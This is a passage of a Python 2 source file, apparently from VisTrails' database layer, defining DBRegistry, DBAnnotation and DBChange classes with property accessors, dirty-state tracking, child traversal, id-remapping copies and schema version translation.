elif hasattr(old_obj, 'db_vistrail_id') and old_obj.db_vistrail_id is not None:
new_obj.db_vistrail_id = old_obj.db_vistrail_id
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
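# update_version translates an object across schema versions: trans_dict
# maps a class name to a dict of per-field conversion callables, and any
# field without an override is copied through unchanged (child objects are
# converted recursively via their own update_version). A minimal
# trans_dict sketch with a hypothetical renamed field:
#
#     trans_dict = {'DBWorkflow': {
#         'name': lambda old_obj, t: old_obj.db_old_name}}
#     new_wf = DBWorkflow.update_version(old_wf, trans_dict)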
def db_children(self, parent=(None,None), orphan=False):
children = []
to_del = []
for child in self.db_connections:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_connection(child)
to_del = []
for child in self.db_annotations:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_annotation(child)
to_del = []
for child in self.db_plugin_datas:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_plugin_data(child)
to_del = []
for child in self.db_others:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_other(child)
to_del = []
for child in self.db_modules:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_module(child)
children.append((self, parent[0], parent[1]))
return children
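# db_children flattens the subtree into (object, parent_type, parent_id)
# tuples, children first, self last; with orphan=True each visited child
# is also detached from this workflow via the matching db_delete_* call.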
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_connections)
children.extend(self.db_deleted_annotations)
children.extend(self.db_deleted_plugin_datas)
children.extend(self.db_deleted_others)
children.extend(self.db_deleted_modules)
if remove:
self.db_deleted_connections = []
self.db_deleted_annotations = []
self.db_deleted_plugin_datas = []
self.db_deleted_others = []
self.db_deleted_modules = []
return children
def has_changes(self):
if self.is_dirty:
return True
for child in self._db_connections:
if child.has_changes():
return True
for child in self._db_annotations:
if child.has_changes():
return True
for child in self._db_plugin_datas:
if child.has_changes():
return True
for child in self._db_others:
if child.has_changes():
return True
for child in self._db_modules:
if child.has_changes():
return True
return False
def __get_db_modules(self):
return self._db_modules
def __set_db_modules(self, modules):
self._db_modules = modules
self.is_dirty = True
db_modules = property(__get_db_modules, __set_db_modules)
def db_get_modules(self):
return self._db_modules
def db_add_module(self, module):
self.is_dirty = True
self._db_modules.append(module)
self.db_modules_id_index[module.db_id] = module
def db_change_module(self, module):
self.is_dirty = True
found = False
for i in xrange(len(self._db_modules)):
if self._db_modules[i].db_id == module.db_id:
self._db_modules[i] = module
found = True
break
if not found:
self._db_modules.append(module)
self.db_modules_id_index[module.db_id] = module
def db_delete_module(self, module):
self.is_dirty = True
for i in xrange(len(self._db_modules)):
if self._db_modules[i].db_id == module.db_id:
if not self._db_modules[i].is_new:
self.db_deleted_modules.append(self._db_modules[i])
del self._db_modules[i]
break
del self.db_modules_id_index[module.db_id]
def db_get_module(self, key):
for i in xrange(len(self._db_modules)):
if self._db_modules[i].db_id == key:
return self._db_modules[i]
return None
def db_get_module_by_id(self, key):
return self.db_modules_id_index[key]
def db_has_module_with_id(self, key):
return key in self.db_modules_id_index
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_entity_type(self):
return self._db_entity_type
def __set_db_entity_type(self, entity_type):
self._db_entity_type = entity_type
self.is_dirty = True
db_entity_type = property(__get_db_entity_type, __set_db_entity_type)
def db_add_entity_type(self, entity_type):
self._db_entity_type = entity_type
def db_change_entity_type(self, entity_type):
self._db_entity_type = entity_type
def db_delete_entity_type(self, entity_type):
self._db_entity_type = None
def __get_db_name(self):
return self._db_name
def __set_db_name(self, name):
self._db_name = name
self.is_dirty = True
db_name = property(__get_db_name, __set_db_name)
def db_add_name(self, name):
self._db_name = name
def db_change_name(self, name):
self._db_name = name
def db_delete_name(self, name):
self._db_name = None
def __get_db_version(self):
return self._db_version
def __set_db_version(self, version):
self._db_version = version
self.is_dirty = True
db_version = property(__get_db_version, __set_db_version)
def db_add_version(self, version):
self._db_version = version
def db_change_version(self, version):
self._db_version = version
def db_delete_version(self, version):
self._db_version = None
def __get_db_last_modified(self):
return self._db_last_modified
def __set_db_last_modified(self, last_modified):
self._db_last_modified = last_modified
self.is_dirty = True
db_last_modified = property(__get_db_last_modified, __set_db_last_modified)
def db_add_last_modified(self, last_modified):
self._db_last_modified = last_modified
def db_change_last_modified(self, last_modified):
self._db_last_modified = last_modified
def db_delete_last_modified(self, last_modified):
self._db_last_modified = None
def __get_db_connections(self):
return self._db_connections
def __set_db_connections(self, connections):
self._db_connections = connections
self.is_dirty = True
db_connections = property(__get_db_connections, __set_db_connections)
def db_get_connections(self):
return self._db_connections
def db_add_connection(self, connection):
self.is_dirty = True
self._db_connections.append(connection)
self.db_connections_id_index[connection.db_id] = connection
def db_change_connection(self, connection):
self.is_dirty = True
found = False
for i in xrange(len(self._db_connections)):
if self._db_connections[i].db_id == connection.db_id:
self._db_connections[i] = connection
found = True
break
if not found:
self._db_connections.append(connection)
self.db_connections_id_index[connection.db_id] = connection
def db_delete_connection(self, connection):
self.is_dirty = True
for i in xrange(len(self._db_connections)):
if self._db_connections[i].db_id == connection.db_id:
if not self._db_connections[i].is_new:
self.db_deleted_connections.append(self._db_connections[i])
del self._db_connections[i]
break
del self.db_connections_id_index[connection.db_id]
def db_get_connection(self, key):
for i in xrange(len(self._db_connections)):
if self._db_connections[i].db_id == key:
return self._db_connections[i]
return None
def db_get_connection_by_id(self, key):
return self.db_connections_id_index[key]
def db_has_connection_with_id(self, key):
return key in self.db_connections_id_index
def __get_db_annotations(self):
return self._db_annotations
def __set_db_annotations(self, annotations):
self._db_annotations = annotations
self.is_dirty = True
db_annotations = property(__get_db_annotations, __set_db_annotations)
def db_get_annotations(self):
return self._db_annotations
def db_add_annotation(self, annotation):
self.is_dirty = True
self._db_annotations.append(annotation)
self.db_annotations_id_index[annotation.db_id] = annotation
def db_change_annotation(self, annotation):
self.is_dirty = True
found = False
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == annotation.db_id:
self._db_annotations[i] = annotation
found = True
break
if not found:
self._db_annotations.append(annotation)
self.db_annotations_id_index[annotation.db_id] = annotation
def db_delete_annotation(self, annotation):
self.is_dirty = True
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == annotation.db_id:
if not self._db_annotations[i].is_new:
self.db_deleted_annotations.append(self._db_annotations[i])
del self._db_annotations[i]
break
del self.db_annotations_id_index[annotation.db_id]
def db_get_annotation(self, key):
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == key:
return self._db_annotations[i]
return None
def db_get_annotation_by_id(self, key):
return self.db_annotations_id_index[key]
def db_has_annotation_with_id(self, key):
return key in self.db_annotations_id_index
def __get_db_plugin_datas(self):
return self._db_plugin_datas
def __set_db_plugin_datas(self, plugin_datas):
self._db_plugin_datas = plugin_datas
self.is_dirty = True
db_plugin_datas = property(__get_db_plugin_datas, __set_db_plugin_datas)
def db_get_plugin_datas(self):
return self._db_plugin_datas
def db_add_plugin_data(self, plugin_data):
self.is_dirty = True
self._db_plugin_datas.append(plugin_data)
self.db_plugin_datas_id_index[plugin_data.db_id] = plugin_data
def db_change_plugin_data(self, plugin_data):
self.is_dirty = True
found = False
for i in xrange(len(self._db_plugin_datas)):
if self._db_plugin_datas[i].db_id == plugin_data.db_id:
self._db_plugin_datas[i] = plugin_data
found = True
break
if not found:
self._db_plugin_datas.append(plugin_data)
self.db_plugin_datas_id_index[plugin_data.db_id] = plugin_data
def db_delete_plugin_data(self, plugin_data):
self.is_dirty = True
for i in xrange(len(self._db_plugin_datas)):
if self._db_plugin_datas[i].db_id == plugin_data.db_id:
if not self._db_plugin_datas[i].is_new:
self.db_deleted_plugin_datas.append(self._db_plugin_datas[i])
del self._db_plugin_datas[i]
break
del self.db_plugin_datas_id_index[plugin_data.db_id]
def db_get_plugin_data(self, key):
for i in xrange(len(self._db_plugin_datas)):
if self._db_plugin_datas[i].db_id == key:
return self._db_plugin_datas[i]
return None
def db_get_plugin_data_by_id(self, key):
return self.db_plugin_datas_id_index[key]
def db_has_plugin_data_with_id(self, key):
return key in self.db_plugin_datas_id_index
def __get_db_others(self):
return self._db_others
def __set_db_others(self, others):
self._db_others = others
self.is_dirty = True
db_others = property(__get_db_others, __set_db_others)
def db_get_others(self):
return self._db_others
def db_add_other(self, other):
self.is_dirty = True
self._db_others.append(other)
self.db_others_id_index[other.db_id] = other
def db_change_other(self, other):
self.is_dirty = True
found = False
for i in xrange(len(self._db_others)):
if self._db_others[i].db_id == other.db_id:
self._db_others[i] = other
found = True
break
if not found:
self._db_others.append(other)
self.db_others_id_index[other.db_id] = other
def db_delete_other(self, other):
self.is_dirty = True
for i in xrange(len(self._db_others)):
if self._db_others[i].db_id == other.db_id:
if not self._db_others[i].is_new:
self.db_deleted_others.append(self._db_others[i])
del self._db_others[i]
break
del self.db_others_id_index[other.db_id]
def db_get_other(self, key):
for i in xrange(len(self._db_others)):
if self._db_others[i].db_id == key:
return self._db_others[i]
return None
def db_get_other_by_id(self, key):
return self.db_others_id_index[key]
def db_has_other_with_id(self, key):
return key in self.db_others_id_index
def __get_db_vistrail_id(self):
return self._db_vistrail_id
def __set_db_vistrail_id(self, vistrail_id):
self._db_vistrail_id = vistrail_id
self.is_dirty = True
db_vistrail_id = property(__get_db_vistrail_id, __set_db_vistrail_id)
def db_add_vistrail_id(self, vistrail_id):
self._db_vistrail_id = vistrail_id
def db_change_vistrail_id(self, vistrail_id):
self._db_vistrail_id = vistrail_id
def db_delete_vistrail_id(self, vistrail_id):
self._db_vistrail_id = None
def getPrimaryKey(self):
return self._db_id
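# DBRegistry holds the set of known packages. Besides the usual id index
# it maintains a composite index keyed by (identifier, version), so a
# package can be found either way. A lookup sketch, using the same key
# shape as db_add_package below:
#
#     reg.db_get_package_by_identifier((pkg.db_identifier, pkg.db_version))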
class DBRegistry(object):
vtType = 'registry'
def __init__(self, id=None, entity_type=None, version=None, root_descriptor_id=None, name=None, last_modified=None, packages=None):
self._db_id = id
self._db_entity_type = entity_type
self._db_version = version
self._db_root_descriptor_id = root_descriptor_id
self._db_name = name
self._db_last_modified = last_modified
self.db_deleted_packages = []
self.db_packages_id_index = {}
self.db_packages_identifier_index = {}
if packages is None:
self._db_packages = []
else:
self._db_packages = packages
for v in self._db_packages:
self.db_packages_id_index[v.db_id] = v
self.db_packages_identifier_index[(v.db_identifier,v.db_version)] = v
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBRegistry.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBRegistry(id=self._db_id,
entity_type=self._db_entity_type,
version=self._db_version,
root_descriptor_id=self._db_root_descriptor_id,
name=self._db_name,
last_modified=self._db_last_modified)
if self._db_packages is None:
cp._db_packages = []
else:
cp._db_packages = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_packages]
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
if hasattr(self, 'db_root_descriptor_id') and ('module_descriptor', self._db_root_descriptor_id) in id_remap:
cp._db_root_descriptor_id = id_remap[('module_descriptor', self._db_root_descriptor_id)]
# recreate indices and set flags
cp.db_packages_id_index = dict((v.db_id, v) for v in cp._db_packages)
cp.db_packages_identifier_index = dict(((v.db_identifier,v.db_version), v) for v in cp._db_packages)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBRegistry()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'entity_type' in class_dict:
res = class_dict['entity_type'](old_obj, trans_dict)
new_obj.db_entity_type = res
elif hasattr(old_obj, 'db_entity_type') and old_obj.db_entity_type is not None:
new_obj.db_entity_type = old_obj.db_entity_type
if 'version' in class_dict:
res = class_dict['version'](old_obj, trans_dict)
new_obj.db_version = res
elif hasattr(old_obj, 'db_version') and old_obj.db_version is not None:
new_obj.db_version = old_obj.db_version
if 'root_descriptor_id' in class_dict:
res = class_dict['root_descriptor_id'](old_obj, trans_dict)
new_obj.db_root_descriptor_id = res
elif hasattr(old_obj, 'db_root_descriptor_id') and old_obj.db_root_descriptor_id is not None:
new_obj.db_root_descriptor_id = old_obj.db_root_descriptor_id
if 'name' in class_dict:
res = class_dict['name'](old_obj, trans_dict)
new_obj.db_name = res
elif hasattr(old_obj, 'db_name') and old_obj.db_name is not None:
new_obj.db_name = old_obj.db_name
if 'last_modified' in class_dict:
res = class_dict['last_modified'](old_obj, trans_dict)
new_obj.db_last_modified = res
elif hasattr(old_obj, 'db_last_modified') and old_obj.db_last_modified is not None:
new_obj.db_last_modified = old_obj.db_last_modified
if 'packages' in class_dict:
res = class_dict['packages'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_package(obj)
elif hasattr(old_obj, 'db_packages') and old_obj.db_packages is not None:
for obj in old_obj.db_packages:
new_obj.db_add_package(DBPackage.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_packages') and hasattr(new_obj, 'db_deleted_packages'):
for obj in old_obj.db_deleted_packages:
n_obj = DBPackage.update_version(obj, trans_dict)
new_obj.db_deleted_packages.append(n_obj)
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
children = []
to_del = []
for child in self.db_packages:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_package(child)
children.append((self, parent[0], parent[1]))
return children
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_packages)
if remove:
self.db_deleted_packages = []
return children
def has_changes(self):
if self.is_dirty:
return True
for child in self._db_packages:
if child.has_changes():
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_entity_type(self):
return self._db_entity_type
def __set_db_entity_type(self, entity_type):
self._db_entity_type = entity_type
self.is_dirty = True
db_entity_type = property(__get_db_entity_type, __set_db_entity_type)
def db_add_entity_type(self, entity_type):
self._db_entity_type = entity_type
def db_change_entity_type(self, entity_type):
self._db_entity_type = entity_type
def db_delete_entity_type(self, entity_type):
self._db_entity_type = None
def __get_db_version(self):
return self._db_version
def __set_db_version(self, version):
self._db_version = version
self.is_dirty = True
db_version = property(__get_db_version, __set_db_version)
def db_add_version(self, version):
self._db_version = version
def db_change_version(self, version):
self._db_version = version
def db_delete_version(self, version):
self._db_version = None
def __get_db_root_descriptor_id(self):
return self._db_root_descriptor_id
def __set_db_root_descriptor_id(self, root_descriptor_id):
self._db_root_descriptor_id = root_descriptor_id
self.is_dirty = True
db_root_descriptor_id = property(__get_db_root_descriptor_id, __set_db_root_descriptor_id)
def db_add_root_descriptor_id(self, root_descriptor_id):
self._db_root_descriptor_id = root_descriptor_id
def db_change_root_descriptor_id(self, root_descriptor_id):
self._db_root_descriptor_id = root_descriptor_id
def db_delete_root_descriptor_id(self, root_descriptor_id):
self._db_root_descriptor_id = None
def __get_db_name(self):
return self._db_name
def __set_db_name(self, name):
self._db_name = name
self.is_dirty = True
db_name = property(__get_db_name, __set_db_name)
def db_add_name(self, name):
self._db_name = name
def db_change_name(self, name):
self._db_name = name
def db_delete_name(self, name):
self._db_name = None
def __get_db_last_modified(self):
return self._db_last_modified
def __set_db_last_modified(self, last_modified):
self._db_last_modified = last_modified
self.is_dirty = True
db_last_modified = property(__get_db_last_modified, __set_db_last_modified)
def db_add_last_modified(self, last_modified):
self._db_last_modified = last_modified
def db_change_last_modified(self, last_modified):
self._db_last_modified = last_modified
def db_delete_last_modified(self, last_modified):
self._db_last_modified = None
def __get_db_packages(self):
return self._db_packages
def __set_db_packages(self, packages):
self._db_packages = packages
self.is_dirty = True
db_packages = property(__get_db_packages, __set_db_packages)
def db_get_packages(self):
return self._db_packages
def db_add_package(self, package):
self.is_dirty = True
self._db_packages.append(package)
self.db_packages_id_index[package.db_id] = package
self.db_packages_identifier_index[(package.db_identifier,package.db_version)] = package
def db_change_package(self, package):
self.is_dirty = True
found = False
for i in xrange(len(self._db_packages)):
if self._db_packages[i].db_id == package.db_id:
self._db_packages[i] = package
found = True
break
if not found:
self._db_packages.append(package)
self.db_packages_id_index[package.db_id] = package
self.db_packages_identifier_index[(package.db_identifier,package.db_version)] = package
def db_delete_package(self, package):
self.is_dirty = True
for i in xrange(len(self._db_packages)):
if self._db_packages[i].db_id == package.db_id:
if not self._db_packages[i].is_new:
self.db_deleted_packages.append(self._db_packages[i])
del self._db_packages[i]
break
del self.db_packages_id_index[package.db_id]
del self.db_packages_identifier_index[(package.db_identifier,package.db_version)]
def db_get_package(self, key):
for i in xrange(len(self._db_packages)):
if self._db_packages[i].db_id == key:
return self._db_packages[i]
return None
def db_get_package_by_id(self, key):
return self.db_packages_id_index[key]
def db_has_package_with_id(self, key):
return key in self.db_packages_id_index
def db_get_package_by_identifier(self, key):
return self.db_packages_identifier_index[key]
def db_has_package_with_identifier(self, key):
return key in self.db_packages_identifier_index
def getPrimaryKey(self):
return self._db_id
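# DBAnnotation is a leaf entity: a plain (key, value) pair with an id. It
# has no child collections, so db_children returns only itself and
# db_deleted_children is always empty.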
class DBAnnotation(object):
vtType = 'annotation'
def __init__(self, id=None, key=None, value=None):
self._db_id = id
self._db_key = key
self._db_value = value
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBAnnotation.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBAnnotation(id=self._db_id,
key=self._db_key,
value=self._db_value)
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
# recreate indices and set flags
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBAnnotation()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'key' in class_dict:
res = class_dict['key'](old_obj, trans_dict)
new_obj.db_key = res
elif hasattr(old_obj, 'db_key') and old_obj.db_key is not None:
new_obj.db_key = old_obj.db_key
if 'value' in class_dict:
res = class_dict['value'](old_obj, trans_dict)
new_obj.db_value = res
elif hasattr(old_obj, 'db_value') and old_obj.db_value is not None:
new_obj.db_value = old_obj.db_value
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
return [(self, parent[0], parent[1])]
def db_deleted_children(self, remove=False):
children = []
return children
def has_changes(self):
if self.is_dirty:
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_key(self):
return self._db_key
def __set_db_key(self, key):
self._db_key = key
self.is_dirty = True
db_key = property(__get_db_key, __set_db_key)
def db_add_key(self, key):
self._db_key = key
def db_change_key(self, key):
self._db_key = key
def db_delete_key(self, key):
self._db_key = None
def __get_db_value(self):
return self._db_value
def __set_db_value(self, value):
self._db_value = value
self.is_dirty = True
db_value = property(__get_db_value, __set_db_value)
def db_add_value(self, value):
self._db_value = value
def db_change_value(self, value):
self._db_value = value
def db_delete_value(self, value):
self._db_value = None
def getPrimaryKey(self):
return self._db_id
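# DBChange appears to represent a single 'change' operation in the action
# log: it carries exactly one payload object in db_data, with db_what
# recording the payload's vtType, while oldObjId/newObjId identify the
# object being replaced and its replacement inside the parent given by
# parentObjId/parentObjType.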
class DBChange(object):
vtType = 'change'
def __init__(self, data=None, id=None, what=None, oldObjId=None, newObjId=None, parentObjId=None, parentObjType=None):
self.db_deleted_data = []
self._db_data = data
self._db_id = id
self._db_what = what
self._db_oldObjId = oldObjId
self._db_newObjId = newObjId
self._db_parentObjId = parentObjId
self._db_parentObjType = parentObjType
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBChange.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBChange(id=self._db_id,
what=self._db_what,
oldObjId=self._db_oldObjId,
newObjId=self._db_newObjId,
parentObjId=self._db_parentObjId,
parentObjType=self._db_parentObjType)
if self._db_data is not None:
cp._db_data = self._db_data.do_copy(new_ids, id_scope, id_remap)
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
if hasattr(self, 'db_oldObjId') and (self._db_what, self._db_oldObjId) in id_remap:
cp._db_oldObjId = id_remap[(self._db_what, self._db_oldObjId)]
if hasattr(self, 'db_newObjId') and (self._db_what, self._db_newObjId) in id_remap:
cp._db_newObjId = id_remap[(self._db_what, self._db_newObjId)]
if hasattr(self, 'db_parentObjId') and (self._db_parentObjType, self._db_parentObjId) in id_remap:
cp._db_parentObjId = id_remap[(self._db_parentObjType, self._db_parentObjId)]
# recreate indices and set flags
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
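# Note the remapping above: oldObjId/newObjId are translated using db_what
# as the type key, and parentObjId using parentObjType, which keeps the
# change consistent with whatever new ids were assigned to the referenced
# objects elsewhere in the same id_remap pass.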
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBChange()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'data' in class_dict:
res = class_dict['data'](old_obj, trans_dict)
new_obj.db_data = res
elif hasattr(old_obj, 'db_data') and old_obj.db_data is not None:
obj = old_obj.db_data
if obj.vtType == 'module':
new_obj.db_add_data(DBModule.update_version(obj, trans_dict))
elif obj.vtType == 'location':
new_obj.db_add_data(DBLocation.update_version(obj, trans_dict))
elif obj.vtType == 'annotation':
new_obj.db_add_data(DBAnnotation.update_version(obj, trans_dict))
elif obj.vtType == 'function':
new_obj.db_add_data(DBFunction.update_version(obj, trans_dict))
elif obj.vtType == 'connection':
new_obj.db_add_data(DBConnection.update_version(obj, trans_dict))
elif obj.vtType == 'port':
new_obj.db_add_data(DBPort.update_version(obj, trans_dict))
elif obj.vtType == 'parameter':
new_obj.db_add_data(DBParameter.update_version(obj, trans_dict))
elif obj.vtType == 'portSpec':
new_obj.db_add_data(DBPortSpec.update_version(obj, trans_dict))
elif obj.vtType == 'abstraction':
new_obj.db_add_data(DBAbstraction.update_version(obj, trans_dict))
elif obj.vtType == 'group':
new_obj.db_add_data(DBGroup.update_version(obj, trans_dict))
elif obj.vtType == 'other':
new_obj.db_add_data(DBOther.update_version(obj, trans_dict))
elif obj.vtType == 'plugin_data':
new_obj.db_add_data(DBPluginData.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_data') and hasattr(new_obj, 'db_deleted_data'):
for obj in old_obj.db_deleted_data:
if obj.vtType == 'module':
n_obj = DBModule.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'location':
n_obj = DBLocation.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'annotation':
n_obj = DBAnnotation.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'function':
n_obj = DBFunction.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'connection':
n_obj = DBConnection.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'port':
n_obj = DBPort.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'parameter':
n_obj = DBParameter.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'portSpec':
n_obj = DBPortSpec.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'abstraction':
n_obj = DBAbstraction.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'group':
n_obj = DBGroup.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'other':
n_obj = DBOther.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'plugin_data':
n_obj = DBPluginData.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'what' in class_dict:
res = class_dict['what'](old_obj, trans_dict)
new_obj.db_what = res
elif hasattr(old_obj, 'db_what') and old_obj.db_what is not None:
new_obj.db_what = old_obj.db_what
if 'oldObjId' in class_dict:
res = class_dict['oldObjId'](old_obj, trans_dict)
new_obj.db_oldObjId = res
elif hasattr(old_obj, 'db_oldObjId') and old_obj.db_oldObjId is not None:
new_obj.db_oldObjId = old_obj.db_oldObjId
if 'newObjId' in class_dict:
res = class_dict['newObjId'](old_obj, trans_dict)
new_obj.db_newObjId = res
elif hasattr(old_obj, 'db_newObjId') and old_obj.db_newObjId is not None:
new_obj.db_newObjId = old_obj.db_newObjId
if 'parentObjId' in class_dict:
res = class_dict['parentObjId'](old_obj, trans_dict)
new_obj.db_parentObjId = res
elif hasattr(old_obj, 'db_parentObjId') and old_obj.db_parentObjId is not None:
new_obj.db_parentObjId = old_obj.db_parentObjId
if 'parentObjType' in class_dict:
res = class_dict['parentObjType'](old_obj, trans_dict)
new_obj.db_parentObjType = res
elif hasattr(old_obj, 'db_parentObjType') and old_obj.db_parentObjType is not None:
new_obj.db_parentObjType = old_obj.db_parentObjType
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
children = []
if self._db_data is not None:
children.extend(self._db_data.db_children((self.vtType, self.db_id), orphan))
if orphan:
self._db_data = None
children.append((self, parent[0], parent[1]))
return children
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_data)
if remove:
self.db_deleted_data = []
return children
def has_changes(self):
if self.is_dirty:
return True
if self._db_data is not None and self._db_data.has_changes():
return True
return False
def __get_db_data(self):
return self._db_data
def __set_db_data(self, data):
self._db_data = data
self.is_dirty = True
db_data = property(__get_db_data, __set_db_data)
def db_add_data(self, data):
self._db_data = data
def db_change_data(self, data):
self._db_data = data
def db_delete_data(self, data):
if not self.is_new:
self.db_deleted_data.append(self._db_data)
self._db_data = None
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_what(self):
return self._db_what
def __set_db_what(self, what):
self._db_what = what
self.is_dirty = True
db_what = property(__get_db_what, __set_db_what)
def db_add_what(self, what):
self._db_what = what
def db_change_what(self, what):
self._db_what = what
def db_delete_what(self, what):
self._db_what = None
def __get_db_oldObjId(self):
return self._db_oldObjId
def __set_db_oldObjId(self, oldObjId):
self._db_oldObjId = oldObjId
self.is_dirty = True
db_oldObjId = property(__get_db_oldObjId, __set_db_oldObjId)
def db_add_oldObjId(self, oldObjId):
self._db_oldObjId = oldObjId
def db_change_oldObjId(self, oldObjId):
self._db_oldObjId = oldObjId
def db_delete_oldObjId(self, oldObjId):
self._db_oldObjId = None
def __get_db_newObjId(self):
return self._db_newObjId
def __set_db_newObjId(self, newObjId):
self._db_newObjId = newObjId
self.is_dirty = True
db_newObjId = property(__get_db_newObjId, __set_db_newObjId)
def db_add_newObjId(self, newObjId):
self._db_newObjId = newObjId
def db_change_newObjId(self, newObjId):
self._db_newObjId = newObjId
def db_delete_newObjId(self, newObjId):
self._db_newObjId = None
def __get_db_parentObjId(self):
return self._db_parentObjId
def __set_db_parentObjId(self, parentObjId):
self._db_parentObjId = parentObjId
self.is_dirty = True
db_parentObjId = property(__get_db_parentObjId, __set_db_parentObjId)
def db_add_parentObjId(self, parentObjId):
self._db_parentObjId = parentObjId
def db_change_parentObjId(self, parentObjId):
self._db_parentObjId = parentObjId
def db_delete_parentObjId(self, parentObjId):
self._db_parentObjId = None
def __get_db_parentObjType(self):
return self._db_parentObjType
